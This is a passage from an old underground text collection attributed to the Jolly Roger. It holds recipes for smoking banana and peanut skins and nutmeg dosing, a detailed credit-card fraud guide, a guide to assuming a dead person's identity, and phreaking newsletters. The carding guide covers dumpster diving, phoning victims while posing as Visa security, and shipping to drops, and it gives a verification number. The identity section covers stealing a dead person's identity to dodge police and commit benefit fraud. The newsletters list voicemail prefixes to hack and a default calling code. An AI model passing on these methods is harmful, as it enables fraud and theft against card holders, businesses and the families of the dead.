3. Allow the skins to dry in a refrigerator
four four to five days, or until the skins are brittle.
4. Now crush the
skins into powder and smoke. Due to its bad taste you can mix it with a more
fragrent smoking medium.
Nutmeg:
1. Take several whole nutmegs
and grind them up in an old grinder.
2. After the nutmegs are ground. Place
in a mortar and pulverize with a pestle.
3. The usual dosage is about 10 or
15 grams. A larger dose may produce excessive thirst,anxiety,and
rapid hart
beat, but hallucinations are rare.
Peanuts:
1. Take 1 pound of raw
peanuts (not roasted)
2. Shell them, saving the skins and discarding the
shells.
3. Eat the nuts.
4. Grind up the skins and smoke them.
-------Exodus-------
Index
The Art of Carding by the Jolly Roger
Obtaining a credit card number: There are many ways to obtain the
information needed to card
something.
The most important things
needed are the card number and the expiration date. Having the card-holders
name doesn't hurt, but it is not essential. The absolute best way to obtain
all the information needed
is by trashing. The way this is done is simple.
You walk around your area or any other area and find a
store, mall,
supermarket, etc., that throws their garbage outside on the sidewalk or
dumpster. Rip the
bag open and see if you can find any carbons at all. If
you find little shreds of credit card carbons,
then it is most likely not
worth your time to tape together. Find a store that does not rip their
carbons at all or only in half.
Another way is to bullshit the
number out of someone. That is call them up and say "Hello, this is
Visa
security and we have a report that your card was stolen." They will deny it and
you will try to
get it out of them from that point on. You could say, "It
wasn't stolen? Well what is the expiration
date and maybe we can fix the
problem....
Ok and what is the number on your card?......Thank you very
much and have a nice day." Or think of
something to that degree.
Another way to get card numbers is through systems such as TRW and CBI,
this is the hard way, and
probably not worth the trouble, unless you are an
expert on the system. Using credit card numbers
posted on BBS's is risky.
The only advantage is that there is a good chance that other people will use
it, thus decreasing the chances of being the sole-offender. The last method
of getting numbers is very
good also.
In most video rental stores,
they take down your credit card number when you join to back-up your
rentals. So if you could manage to steal the list or make a copy of it, then
you are set for a LONG
time. Choosing a victim: Once you have the card
number, it is time to make the order. The type of
places that are easiest to
victimize are small businesses that do mail order or even local stores that
deliver.
If you have an ad for a place with something you want and
the order number is NOT a 1-800 number then
chances are better that you will
succeed. Ordering: When you call the place up to make the order, you
must
have several things readily at hand.
These are the things you will need:
A name, telephone number, business phone, card number (4 digit
bank code if
the card is MasterCard), expiration date, and a complete shipping and billing
address. I
will talk about all of these in detail. A personal tip: When I
call to make an order, it usually goes
much smoother if the person you are
talking to is a woman. In many cases they are more gullible than
men. The
name: You could use the name on the card or the name of the person who you are
going to send
the merchandise to. Or you could use the name on the card and
have it shipped to the person who lives
at the drop (Say it is a gift or
something).
The name is really not that important because when the
company verifies the card, the persons name is
never mentioned, EXCEPT when
you have a Preffered Visa card. Then the name is mentioned. You can tell
if
you have a Preffered Visa card by the PV to the right of the expiration date on
the carbon. Nophone
all day long waiting for the company to call (Which they
will), then the phone number to give them as
your home-phone could be one of
the following: A number that is ALWAYS busy, a number that ALWAYS
rings, a
payphone number, low end of a loop (and you will wait on the other end), or a
popular BBS.
NEVER give them your home phone because they will find out
as soon as the investigation starts who the
phone belongs to. The best thing
would be to have a payphone call forward your house (via Cosm The
business
number: When asked for, repeat the number you used for your home phone.
Card number:
The cards you will use will be Visa, Mastercard,
and American Express. The best is by far Visa. It is
the most
straight-forward. Mastercard is pretty cool except for the bank code. When they
ask for the
bank code, they sometimes also ask for the bank that issued it.
When they ask that just say the
biggest bank you know of in your area. Try
to avoid American Express. They tend to lead full scale
investigations.
Unfortunately, American Express is the most popular card out. When telling the
person
who is taking your call the card number, say it slow, clear, and with
confidence.
e.g. CC# is 5217-1234-5678-9012. Pause after each set of four so
you don't have to repeat it.
Expiration date:
The date must be
at LEAST in that month. It is best to with more than three months to go.
The address:
More commonly referred to as the 'drop'. Well the
drop can range from an abandoned building to your
next door neighbors
apartment. If you plan to send it to an apartment building then be sure NOT to
include an apartment number. This will confuse UPS or postage men a little
and they will leave the
package in the lobby.
Here is a list of various
drops: The house next door whose family is on vacation, the apartment that
was just moved out of, the old church that will be knocked down in six
months, your friends house who
has absolutely nothing to do with the type of
merchandise you will buy and who will also not crack
under heat from feds,
etc..
There are also services that hold merchandise for you, but
personally I would not trust them. And
forget about P.O. Boxes because you
need ID to get one and most places don't ship to them anyway.
Other aspects
of carding:Verifying cards, seeing if they were reported stolen.
Verifying cards:
Stores need to verify credit cards when someone
purchases something with one. They call up a service
that checks to see if
the customer has the money in the bank.
The merchant identifies himself
with a merchant number. The service then holds the money that the
merchant
verified on reserve. When the merchant sends in the credit card form, the
service sends the
merchant the money. The service holds the money for three
days and if no form appears then it is put
back into the bank. The point is
that if you want to verify something then you should verify it for a
little
amount and odds are that there will be more in the bank.
The good thing
about verification is that if the card doesn't exist or if it is stolen then the
service will tell you. To verify MasterCard and Visa try this number. It is
voice:1-800-327-1111
merchant code is 596719.
Stolen cards:
Mastercard and Visa come out with a small catalog every week where they
publish EVERY stolen or
fraudulantly used card. I get this every week by
trashing the same place on the same day. If you ever
find it trashing then
try to get it every week.
Identifying cards:
Visa card numbers
begin with a 4 and have either 13 or 16 digits. MasterCard card numbers begin
with a
5 and have 16 digits. American Express begins with a 3 and has 15
digits. They all have the formats of
the following:
3xxx-xxxxxx-xxxxx
American Express
4xxx-xxx-xxx-xxx Visa
4xxx-xxxx-xxxx-xxxx Visa
5xxx-xxxx-xxxx-xxxx MasterCard
Gold cards:
A gold card
simply means that credit is good for $5000. Without a gold card, credit would be
normally
$2000. To recognize a gold card on a carbon there are several
techniques:
American Express-none.
Visa-PV instead of CV.
Note-When
verifying a PV Visa, you have to have the real name of the cardholder.
Mastercard-An asterix can signify a gold card, but this changes depending
when the card was issued.
I am going to type out a dialog between a carder
and the phone operator to help you get the idea.
Operator: "Over-priced
Computer Goods, may I help you?"
Carder: "Hi, I would like to place an order
please."
Operator: "Sure, what would you like to order?"
Carder: "400
generic disks and a double density drive."
Operator: "Ok, is there anything
else?"
Carder: "No thank you, that's all for today."
Operator: "Ok, how
would you like to pay for this? MasterCard or Visa?"
Carder: "Visa."
Operator: "And your name is?"
Carder: "Lenny Lipshitz." (Name on card)
Operator: "And your Visa card number is?"
Carder: "4240-419-001-340"
(Invalid card)
Operator: "Expiration date?"
Carder: "06-92."
Operator: "And where would you like the package shipped to?"
Carder:
"6732 Goatsgate Port. Paris,texas,010166."
Operator: "And what is your home
telephone number?"
Carder: "212-724-9970" (This number is actually always
busy)
Operator: "I will also need your business phone number in case we have
to reach you."
Carder: "You can reach me at the same number. 212-724-9970"
Operator: "O.K. Thank you very much and have nice day."
Carder: "Excuse
me, when will the package arrive?"
Operator: "In six to seven days UPS."
Carder: "Thanks alot, and have a pleasant day."
Now you wait 6-7
days when the package will arrive to the address which is really a house up for
sale.
There will be a note on the door saying, "Hello UPS, please leave all
packages for Lenny Lipshitz in
the lobby or porch. Thanks alot, Lenny
Lipshitz" (Make the signature half-way convincing)
Still as DANGEROUS as
ever............. Exodus
Index
Recognizing credit cards by the Jolly Roger
[Sample: American Express]
XXXX XXXXXX XXXXX
MM/Y1 THRU MM/Y2 Y1
John Doe AX
Explanation:
The first date is the date the
person got the card, the second date is the expriation date, after the
expiration date is the same digits in the first year.The American Express
Gold has many more numbers
(I think 6 8 then 8). If you do find a Gold card
keep it for it has a $5000.00 backup even when the
guy has no money!
[Sample: Master Card]
5XXX XXXX XXXX XXXX
XXXX AAA DD-MM-YY MM/YY
John Doe.
Explanation:
The format varies, I have never seen
a card that did not start with a 5XXX there is another 4 digits
on the next
line that is sometimes asked for when ordering stuff, (and rarely a 3 digit
letter combo
(e. ANB). The first date is the date the person got the card
and the second date is the expiration
date. Master Card is almost always
accepted at stores.
[Sample: VISA]
XXXX XXX(X) XXX(X) XXX(X)
MM/YY
MM/YY*VISA
John Doe
Explanation:
Visa is the most straight
forward of the cards,for it has the name right on the card itself, again the
first date is the date he got the card and the second is the expiration
date. (Sometimes the first
date is left out). The numbers can eather be 4 3
3 3 or 4 4 4 4. Visa is also almost always accepted
at stores, therefore,
the best of cards to use.
Index
How To Create A New Indentity By The Walking Glitch
Courtesy of the Jolly Roger!
You might be saying, "Hey Glitch,
what do I need a new identity for?" The answer is simple. You might
want to
go buy liquor somewhere, right? You might want to go give the cops the false
name when you get
busted so you keep your good name, eh? You might even want
to use the new identity for getting a P.O.
Box for carding. Sure! You might
even want the stuff for renting yourself a VCR at some dickless loser
of a
convenience store. Here we go:
Getting a new ID isn't always easy, no one
said it would be. By following these steps, any bozo can
become a new bozo
in a coupla weeks.
STEP 1
The first step is to find out who
exactly you'll become. The most secure way is to use someone's ID
who
doesn't use it themselves. The people who fit that bill the best are dead. As an
added bonus they
don't go complaining one bit. Go to the library and look
through old death notices. You have to find
someone who was born about the
same time as you were, or better yet, a year or two older so you can
buy
booze, etc. You should go back as far as you can for the death because most
states now cross index
deaths to births so people can't do this in the
future. The cutoff date in Wisconsin is 1979, folks in
this grand state
gotta look in 1978 or earlier. Anything earier there is cool. Now, this is the
hardest part if you're younger. Brats that young happen to be quite
resilient, takin' falls out of
three story windows and eating rat poison
like its Easter candy, and not a scratch or dent. There
ain't many that die,
so ya gotta look your ass off. Go down to the library and look up all the death
notices you can, if it's on microfilm so much the better. You might have to
go through months of death
notices though, but the results are well worth
it. You gotta get someone who died locally in most
instances: the death
certificate is filed only in the county of death. Now you go down to the county
courthouse in the county where he died and get the death certificate, this
will cost you around $3-$5
depending on the state you're in. Look at this
hunk of paper, it could be your way to vanish in a
clould of smoke when the
right time comes, like right after that big scam. If You're lucky, the slobs
parents signed him up with social security when he was a snot nosed brat.
That'll be another piece of
ID you can get. If not, thats ok too. It'll be
listed on the death certificate if he has one. If
you're lucky, the stiff
was born locally and you can get his birth certificate right away.
STEP
2
Now check the place of birth on the death certificate, if it's in the
same place you standing now
you're all set. If not, you can mail away for
one from that county but its a minor pain and it might
take a while to get,
the librarian at the desk has listings of where to write for this stuff and
exactly how much it costs. Get the Birth cirtificate, its worth the extra
money to get it certified
because thats the only way some people will accept
it for ID. When yur gettin this stuff the little
forms ask for the reason
you want it, instead of writing in "Fuck you", try putting in the word
"Geneology". They get this all the time. If the Death certificate looks good
for you, wait a day or so
before getting the certified birth certificate in
case they recognize someone wanting it for a dead
guy.
STEP 3
Now your cookin! You got your start and the next part's easy. Crank out
your old Dot matrix printer
and run off some mailing labels addressed to you
at some phony address. Take the time to check your
phony address that there
is such a place. Hotels that rent by the month or large apartment buildings
are good, be sure to get the right zip code for the area. These are things
that the cops might notice
that will trip you up. Grab some old junk mail
and paste your new lables on them. Now take them along
with the birth
certificate down to the library. Get a new library card. If they ask you if you
had one
before say that you really aren't sure because your family moved
around alot when you were a kid. Most
libraries will allow you to use
letters as a form of ID when you get your card. If they want more give
them
a sob story about how you were mugged and got your wallet stolen with all your
identification.
Your card should be waiting for you in about two weeks. Most
libraries ask for two forms of ID, one
can be your trusty Birth Certificate,
and they do allow letters addressed to you as a second form.
STEP 4
Now you got a start, it isn't perfect yet, so let's continue. You should
have two forms of ID now.
Throw away the old letters, or better yet stuff
them inside the wallet you intend to use with this
stuff. Go to the county
courthouse and show them what nice ID you got and get a state ID card. Now you
got a picture ID. This will take about two weeks and cost about $5, its well
worth it.
STEP 5
If the death certificate had a social security
number on it you can go out and buy one of those metal
SS# cards that they
sell. If it didn't, then you got all kinds of pretty ID that shows exactly who
you
are. If you don't yet have an SS#, Go down and apply for one, these are
free but they could take five
or six weeks to get, Bureaucrats you know...
You can invent a SS# too if ya like, but the motto of
'THE WALKING GLITCH'
has always been "Why not excellence?".
STEP 6
If you want to go
whole hog you can now get a bank account in your new name. If you plan to do
alot of
traveling then you can put alot of money in the account and then say
you lost the account book. After
you get the new book you take out all the
cash. They'll hit you with a slight charge and maybe tie-up
your money some,
but if you're ever broke in some small town that bank book will keep you from
being
thrown in jail as a vagrant.
ALL DONE?
So kiddies, you
got ID for buying booze, but what else? In some towns (the larger the more
likely) the
cops if they catch you for something petty like shoplifting
stuff under a certain dollar amount, will
just give you a ticket, same thing
for pissing in the street. Thats it! No fingerprints or nothing,
just pay
the fine (almost always over $100) or appear in court. Of course they run a
radio check on
your ID, you'll be clean and your alter-ego gets a blot on
his record. Your free and clear. Thats
worth the price of the trouble you've
gone through right there. If your smart, you'll toss that ID
away if this
happens, or better yet, tear off your picture and give the ID to someone you
don't like,
maybe they'll get busted with it. If you're a working stiff,
here's a way to stretch your dollar. Go
to work for as long as it takes to
get unemployment and then get yourself fired. Go to work under the
other
name while your getting the unemployment. With a couple of sets of ID, you can
live like a king.
These concepts for survival in the new age come to you
compliments of THE WALKING GLITCH. First
release of this phile 7/7/88.
brought to you in the Cookbook IV courtesy of...
--------------Exodus-------------
Index
The Remote Informer
Editors: Tracker, Norman Bates, and Ye Cap'n September 26, 1987 Issue:
02 # Brought to you by the
'new' TUFF: The Underground Fone Federation
The News
Celestial Elite/TUFF Come to an End
Celestial
Elite and TUFF, the famous hack/phreak groups came to an end a couple weeks ago.
TUFF,
however, is being reborn and you can expect it to be back to full
force within a month. Sources have
it that Magnus Adept, head of the now
terminated group, Celestial Elite, has started a new group
called Avalon
Kingdom. We are unsure what plans are in store for it.
TUFF has several
ideas and plans that will be out to the public soon. Look for future issues of
The
Remote Informer (tm) for new updates.
Sprint Strikes Back
Sprint caught a guy dealing codes on the street in LA this past week.
Information on this bust is
limited at this time.
A seventeen year
old was busted in Arizona last week. The name of the teenager will not be
printed to
protect him from harassment calls.
This information was
supplied by Phreaky Phone II
Beige Box Bust
One of our editors
and a member of TUFF, Norman Bates was caught for Beige boxing that he had done
over 3 months ago. The calls he had made were inside his state and cost a
total of $12. He paid the
bill and no charges were filed against him.
TeleNet Hacker
Crusader released his TeleNet hacking program on
September 20, 1987. Look for it on a good board you
call. A review will be
in the next issue of The Remote Informer.
Bate's Motel Moves
Bate's Motel BBS, run by Norman Bates, was forced to move. It is
temporarily set up at (619)267-8619.
It will remain 1200 baud, and a member
of the TUFF Network. It is open to the public.
Phreaky Phones Return:
Amazing?
The original Phreaky Phone numbers now support the new Phreaky
Phones. The guys running them had
protested that the lines were being
monitored. There is no way that could have been, and they
contradicted
themselves by restarting Phreaky Phones on the same numbers. They gave alot of
credit to
the people calling to suggest they believe a story like that.
LDDS Buys Out TMC: Companies Merge
LDDS bought out TMC last
month. They merged into LDDS, since it was bigger and more widespread. Any
companies that were subscribing to the TMC long distance service were
automatically coverted to LDDS.
All local TMC ports still work, but will
soon be disconnected. Refer to the article on LDDS in this
issue for more
information on LDDS dial-ups.
US Sprint Calls Destinations
US
Sprint now calls all the numbers called with unauthorized codes. Their
dis-advantage is that they
are delayed by about two months in calling
because they have to wait till people report they did not
make calls to the
numbers they were billed for. Best advice is to not call voice with Sprint
except to
those who have private lines other than their regular phone line.
Pirate's Hollow Is Back With 10 Megs
Pirate's Hollow is back
on-line. It now is run a 10 meg hard drive. Unlike most boards that have #'s
of megs, this one will stress more attention on it's database. The database
is scheduled to be online
by October 1st. This database will contain 800+
text files on various topics, with about 60% - 70%
pertaining to illegal
activities. Unfortunately, Trax Xe is being redesigned, so until it is finished,
it will run on Carina. The number is (415)593-6784 (300/1200 baud).
Raggers and Braggers
This section is to make you aware of
well-known raggers and braggers. Since this is the first time
this section
is being printed, we will tell you what classifies people as raggers and
braggers. In the
future issues the top raggers and braggers will be listed
in this newsletter to let the SysOps know
who not to let on their board, or
to atleast keep an eye on.
A ragger is someone who will put someone else
down for something. The person might post a message
asking a novice question
about hacking and phreaking, or may say something that is completely wrong,
and a ragger will put the other person down for he said, posted, etc. The
ones that usually classify
in this category are the ones that think they
know it all and consider themselves right no matter what
anyone says. Most
of the users that use codes and consider themselves a master phreaker usually
become
raggers.
A bragger is someone who either does or thinks he
does know everything, and puts it upon himself to
tell the whole world that
he knows it all. This person is also one who thinks he is better than
everyone else and he believes he is Elite, and no one else is. People who
tend to do this are those
who have, for some reason, become well-known in
the underworld, and as a result become a bragger.
Those usually not too
well-known will not tend to brag as much as those who think everyone would love
to be their friend and be like them.
As a well-known ragger and
bragger, The Toad, learned that it does not help to be one or both of
those.
He has since changed and is now easily accepted by most. Most people disliked
him because
others they knew had said something bad about him. This is
called peer pressure and is a bad influence
to those who are new to the
underworld. I would suggest in the future, to not judge someone by what
others say, but rather by how they act around/to you.
The current
most popular Atarian that classifies as a ragger and a bragger is Ace of Aces,
and is
well-hated by many users and SysOps, since he tends to put down
anything anyone says and considers
himself the best at writing hacking
programs. He is commonly referred to as Ass of Asses and Ass of
Assholes.
Even holding an open mind about this guy, you would soon come to find that what
others said
coincides with what you see from him.
A New 950 has
arrived!
LDDS, who as mentioned above bought out TMC, is installing a
new 950 port to most major cities. By the
time you read this, it should be
in almost every area that supports 950 ports. The number is 950-1450.
This
port will dial 976 numbers, but not 700, 800, or 900 numbers. The dialing method
for LDDS is: 7
digit code, then even if the code is bad it will give you a
dial tone. Then dial the area code plus
the number. If you have a bad code
it will simply say your call cannot be completed as it was dialed.
There is
a default code used on the system that currently works. The code is simply,
1234567. I have
seen codes from 5 different companies and they all are in
the format of 00xxxxx. I do not know what
type of software they use, but I
will know by the next issue exactly what they place on the bills.
This could
be the answer to alot of people's problems with fear of Sprint and ITT,
especially AllNets.
Just remember, Tracker is the one who found this, and
all information about it. If someone is seen
saying they found this, then
they will be listed in the next issue which will contain an article on
leeches.
Mailbox Systems
Mailbox systems are the link
between information and the underworld. If you have ever called one, then
you will know the advantages of having one, especially the ones that are
open to whole underworld,
rather than just a select few. There are two types
of mailbox systems that are widely used.
The first type we will talk
about is the multiple mailbox systems, or commonly referred to as message
systems. These systems have several mailboxes set up on one number. Usually,
you can access other
mailboxes from that number by pressing '*' or '#'.
Sometimes you just enter the mailbox number and you
are connected. These are
the safest systems to use to protect information from US Sprint and other
long distance companies. Since US Sprint and other companies call the
destination numbers, it is safer
to have 800 mailbox systems, and most of
the time, the multiple mailbox systems are on 800 numbers.
The passcode on
these systems can vary in length and can be accessed by several different
methods, so
it is impossible to explain exactly how to hack these systems.
The other type is the single mailbox system. These are usually set up in
a reserved prefix in an area
code. (Ex: 713-684-6xxx) These systems are
usually controlled by the same type of hardware/software.
To access the area
where you enter the passcode, just hit '0' for a second or so. The passcodes are
four (4) digits long. The only way to hack these is manually. The best thing
you could do is to find
one that does not have a recording from a person,
but just the digitized voice. If you hack one that
someone already owns,
they will report it and it will not last as long.
Here is a list
mailboxes or prefixes to help you get started
Single Multiple Digits
------------ ------------ --------
213-281-8xxx 212-714-2770 3
213-285-8xxx 216-586-5000 4
213-515-2xxx 415-338-7000 Aspen Message
System 3
214-733-5xxx 714-474-2033 Western Digital
214-855-6xxx
800-222-0651 Vincent and Elkins 4
214-978-2xxx 800-233-8488 3
215-949-2xxx 800-447-8477 Fairylink 7
312-450-8xxx 800-521-5344 3
313-768-1xxx 800-524-2133 RCA 4
405-557-8xxx 800-527-0027 TTE
TeleMessager 6
602-230-4xxx 800-632-7777 Asynk 6
619-492-8xxx
800-645-7778 SoftCell Computers 4
713-684-6xxx 800-648-9675 Zoykon 4
800-847-0003 Communications World 3
The Disclaimer!
We, the
editors, take no responsibility for your actions and use of the information in
this
newsletter. This newsletter is for informational purposes only. If you
are easily offended by
telecommunication discussions, then we suggest that
you not read this newsletter. But for those who
are truely interested in the
information in this newsletter, enjoy it.
Coming in the next issue!
In the next issue, we will be open for suggestions from the readers of
this issue. We will have some
featured articles though, which include:
*
Study of bridges
* Review of Crusader's new TeleNet Hacker
* More
information on the new LDDS 950 port
* Review of Code Hackers for all modems
* List of TeleNet addresses
* Credit Card checkers
* Ideas from the
readers
Brought to you in Cookbook IV by EXODUS!!!!!!!!!!!!!!!
Index
The Remote Informer Newsletter!
November TRI Issue: 03
The Editors: Tracker, Ye Cap'n, Norman Bates,
and The Reporter
Introduction
It's been a month now, and ALOT
has happened. So much, in fact, that the information will be split
into
several issues. This should be no shock since I mentioned in the first issue
that we may put
several issues out sometimes.
I want to congratulate
the readers for finally contributing to the newsletter. This first two issues
were all on information that I, myself, obtained. Several people gave me
information for these issues,
and their handle and information is included
in the articles.
In The News!
Information!
We have so
much info to put out, that we are putting out many issues at one time. If you
want all
issues that are out now, then call one of the boards at the end of
the issue or look for an editor on
a hack BBS.
ITT has 9 digits!
For those of you who did not know this, ITT has nine digit codes. They
are said to give better
connections to some extent. This info. was
originally given to us by Party Beast.
Phreaky Phones Go Down!
The famed Phreaky Phones are down again. Modem Man, the original person
that started them, has said
that they will be down until further notice. In
the meantime, other independent boxes are being
started. A listing can be
made of current ones on request.
Magnus Adept Gets Busted
Fellow
Atarian and well- known phreak Magnus Adept got caught by MCI. Details of the
how, when, and
where are not known at this time. He got caught with 150
codes and may have to pay up to 50 dollars
for each code.
Sprint
Codes Are Dying Fast!
Sprint codes are hard to get and when they are
obtained, they tend to die rather quickly. Phreakers
have been saying that
the 950-0777 port is dead, but on the contrary, it is still available in states
that are not highly abused by phreaks. Here again, rumors are being spread.
The Best BBS of the Month
Starting from now on, we will have a
BBS of the month. We will choose a BBS, ragardless of computer
type, and
look at the user participation in phreak related matters, as well as quality
discussions on
the various illegal topics. A BBS can remain the BBS of the
month as long as they reside above the
rest of the BBS systems. Even though
we will sometimes bring out more than one issue in a month, the
board will
remain BBS of the month until the first issue inthe next month comes out.
This month's BBS of the month is FBI PirateNet. We chose this board
because of the large numbers of
posts in the bases, and not only
information, but discussions as well, with a minimum number of posts
from
raggers and braggers. The number for it is 516-661-7360. The SysOp of FBI
PirateNet is The
Phantom, not to be confused with an earlier narc.
US Sprint Expected to Trim Staff, Consolidate Divisions
New York
-- US Sprint Communications Corp., the troubled long distance carrier, is
expected to
announce soon that it will cut its work force by several hundred
people and reduce its seven regional
divisions to 3 operating groups,
sources familiar with the company said.
The company's Pacific division
is based in Burlingame, CA. The layoffs and reorganization are part of
a
plan by US Sprint's new president, Robert H. Snedaker, to reduce heavy operating
losses, which
analysts expect to reach more than $800 million this year.
Snedaker replaced Charles M. Slibo, who was forced to resign in July
because losses were running much
higher than the parent companies had
expected. Problems with the company's computerized billing system
also
contributed to Skibo's ouster. US Sprint is owned and operated by the GTE Corp.
and United
TeleCom.
According to sources close to Snedaker, who was
vice chairman and chief operating officer of United
TeleCom, he is planning
to consolidate the company's 7 divisions, which operate in the same
geographical regions as the seven regional Bell operating companies, into 3
divisions.
The rationale for the move, according to idustry analysts, is
that the company will need a much
smaller work force once it begins handling
all it's phone traffic on it's new fiber optic network,
which can carry a
greater number of telephone calls at less cost. Company officials have said that
they expect to have most of the traffic on the network by early next year.
One source said that there would be more than one round of layoffs in
the coming months and that the
company ultimately plans to reduce its 14,000
member work force by 15 percent.
Several top managers are expected to
resign as soon as US Sprint centralizes its marketing and support
operations
as its headquarters in Kansas City, MO., according to a report in the latest
issue of
Business Week magazine.
A spokesman for US Sprint said on
Friday that the company would not comment on the rumors. The company
is the
nation's third largest long distance company, after the American Telephone and
Telegraph Co.
(AT&T) and MCI Communications Co.
Last year,
Washington based MCI undertook a similar reorganization in which it posted a
$502.5 million
loss to write down old inventory and restructure operations.
Analysts said that is US Sprint is to turn a profit, the company must
increase its market share. "To
do this, US Sprint must gain more large
business customers, which account for about 80 percent of
industry
revenues," said Robert B. Morris III, Securities in San Francisco.
Morris said that by using a slick marketing campaign to differentiate
its all-fiber telephone network
from those of competitors, US Sprint more
than doubled its customer base last year. But "most of these
customers were
residential and small business users that added little to Sprint's bottom line,"
he
added. "If the company expects to be profitable, it will have to
concentrate on providing the best
service to volume users." ] This
information was supplied by Ye Cap'n
Secret Service Cracks Down on Teen
Hackers
Mount Lebanon, PA -- The US Secret Service and local police
departments have put a scare into the
hacker community with a nationwide
crackdown on computer crime that has resulted in the arrests of
teenage
hackers in at least three cities.
"People who monitor the bulletin
boards say there are a lot of nervous hackers out there, wondering
who will
be arrested next," says Ronald E. Freedman, vice-president of Advanced
Information
Management, a Woodbridge, VA base computer security firm.
Nine teenagers from Mount Lebanon Junior-Senior High School near
Pittsburg, PA, were arrested recently
and charged with computer fraud. The
juveniles allegedly used home computers to gain illegal access to
a credit
card authorization center. They obtained valid credit card numbers and used them
to purchase
thousands of dollars worth of mail order merchandise, the police
said.
Freedman says it appears the hackers used some relatively
sophisticated techniques in the scheme,
including specially written software
that enabled them to bypass security controls and navigate
through credit
records to obtain key information.
Police officials say that the hackers
also obtained access codes from pirate bulletin board systems to
make free
long distance calls and gain access to various business and government
computers.
The arrests were the result of a 6 week investigation by the
Secret Service and the Mount Lebanon
police. The police were tipped off by
parents who were suspicious about how their son managed to
obtain a
skateboard valued at $140.
The Secret Service was also involved in
investigations that led to the arrests of several hackers in
San Francisco
and New York last July.
Secret Service spokesman William Corbett says
that although some reports have portrayed the hackers as
part of a national
crime ring, the cases are unrelated. "It's just that a few of these computers
hacking cases came to a head at about the same time," he says.
Federal Legislation enacted in 1984 gives the Secret Service, part of
the Department of the Treasury,
a major role in investigating computer
crimes. Under the federal Computer Fraud and Abuse Act of 1986,
computer
fraud is a felony that carries a maximum penalty of 5 years for the first
offense, and 10
years for the second. Displaying unauthorized passwords on
hacking bulletin boards carries a maximum
penalty of 1 year in prison for
the first offense, and 10 years for the second. ] This information was
supplied by Ye Cap'n
German Teens Crack NASA
Washington,
D.C. -- A group of West German teenagers from the Chaos Computer Club penetrated
a NASA
network recently, saying they were doing it to "test the security."
What they got into was SPAN Net, a computer network with about 700
notes, which is actually based at
the Goddard Space Center in Maryland. All
that's in there is unclassified data, space science
information, and
post-flight data anaysis. "Anyone with NASA related research can apply for
access to
SPAN" says a spokesman, who adds that the network runs on DEC VAX
hardware. "We picked up three
attempts to gain access and put in security
precautions so it would't happen." His personal opinion
is, "We're happy
that they couldn't get back in, and decided to go public." He also added that
NASA
has many other networks, many of the classified and "probably
inpenetrable. But I do not want to
challenge anybody."
How'd they
get in? Probably they got a West German NASA licensee, which gave them a
visitor's pass,
then they created new passwords with unlimited security for
themselves, after which getting around the
network was easy. ] Supplied by
Ye Cap'n
We look for information in anyway related to the newsletter. If
you have something of interests, or
something that you saw on television, or
in the newspaper, then upload it to one of the boards listed
below. You will
receive full credit.
Pirate's Hollow.......(415)593-6784
Bate's
Motel..........(619)267-0293
Index
The Remote Informer Newsletter!
November TRI Issue: 04
The Editors: Tracker, Ye Cap'n, Norman Bates,
and The Reporter
FCC Charges Much Ado About Not Much
New Cannan,
CT -- International Resource Develope of New Cannan, CT says that the market
bubble for
packet switch networks like TeleNet is going to burst by 1991,
regardless of what the Federal
Communications Commission does about access
charges. Cheap fiber, which greatly increases the
capacity, and ISDN
services, which let you share a phone line with your computer, will do the
business
in, the report says. Over the next four years, however, the demand
for packet switch services to will
grow from $650 million to $1,612 million
(If the Baby Bells are allowed to add competition to the
market, the $5/hour
access charge cannot be passed though to the customers anyway). ] Supplied by Ye
Cap'n
Pirate's Hollow Update
San Carlos, CA -- The Pirate's
Hollow, one of the more popular BBS's in the Bay Area, is installing
several
new features that will even add to it's popularity. For one, users will be able
to gamble
against each other by betting on NFL games and participating in
the Pirate's Hollow Lottery. Also, in
order to support one of the best
newsletters around, the Pirate's Hollow will soon be adding a
seperate
module that will act as an outpost for The Remote Informer. This module will
feature the
older issues of the newsletter, a section that will keep you
abreast of updates of recently released
information, and a section that will
show what is upcoming in the next issues of The Remote Informer.
The
long-awaited database will soon be put online. Over 800 textfiles on a variety
of subjects will be
available to the users that pay the access fee that will
be determined at a later date. Many more are
on the way, and will be
included at no charge. The charge will be a one time charge though, rather
than a yearly payment.
Another new option will be available by early
December. PC Pursuit callback will be installed. This
will allow people to
call and then get called back if your area code is supported by PC Pursuit. This
will also require a charge, to be set at a later date.
The Pirate's
Hollow has been doing well in its comeback to the telecommunications world, but
we need
more callers in order to formulate a more diverse user base. Please
spread the BBS # around while also
trying to make others aware of the
newsletter.
Switching Systems
There are currently three
different forms of switching systems that are present in the United States
today. Step by Step (SxS), Crossbar, and the Electronic Switching System
(ESS) make up the group.
Phreaks have always been a little tenative when it
comes to "doing their work" once they have heard
about effects of switching
systems on their hobby. After researching this topic, I have found that
there really is not that much to be worried about. Read on, while I share
with you information which I
have compiled about all of these switching
systems and their distinct features.
The first switching system that was
used in the country was called Step by Step. This was adopted in
1918 by
Bell, and until 1978, they had over 53% of all their exchanges using Step by
Step (SxS). This
system is known for it's long, confusing train of switches
that are used for its step by step
switching.
Step by Step has many
disadvantages to phone users. The switch train becomes jammed fairly often, and
it causes calls to be blocked. Also, SxS does not allow the use of DTMF
dialing. This accounts for
some of the areas in the United States that
cannot have touch tone dialing abilities. A tremendous
amount of electricity
and maintenance needs to accompany the SxS switching system, which makes it even
more impratical. All in all, this is probably the most archaic switching
system around.
There are a number of ways to see if you are on SxS. You
will notice that there are no pulsing digits
after dialing. Most sources say
that the phone company will sound like many typewriters. SxS does not
offer
features such as speed calling, call forwarding, three-way calling, call
waiting, and other such
services. Pay phones on SxS also will want your
money before you receive a dial tone. This adds to the
list of disadvantages
labelled to that of the Step by Step switching systems.
Another type of
switching system that is prevalent in the United States is Crossbar. Crossbar
has been
Bell's primary switcher after 1960, and three types of it exists.
Number 1 Crossbar (1xB), Number 4
Crossbar (4xB), and the Number 5 Crossbar
(5xB). In Crossbar, a switching matrix is used for all the
phones in an
area, and when someone calls, the route is determined and is met up with the
other phone.
This matrix is set-up in horizontal and vertical paths. Unlike
other swichting systems, in my
research, I could not come up with any true
and definate distinguishing features of the Crossbar
switching systems.
The Electronic Switching System (ESS) is yet another switching system
used in the United States and
the most used of all three swicthing systems.
ESS is an extremely advanced and multi-faced type of
switching system, and
is feared by marauders of the phone company everywhere. With ESS, your phone
company is able to know every digit dialed (including mistakes), who you
call, when you called, and
how long you were connected. ESS is also
programmed to print out the numbers of people who make
excessive calls to
WATS numbers (800 services) or directory assistance. This feature of ESS is
called
800 Exceptional Calling Report, and has spelled the end of some forms
of continuous code hacks to
certain extenders. ESS can also be programmed to
print logs of who called and abused certain numbers
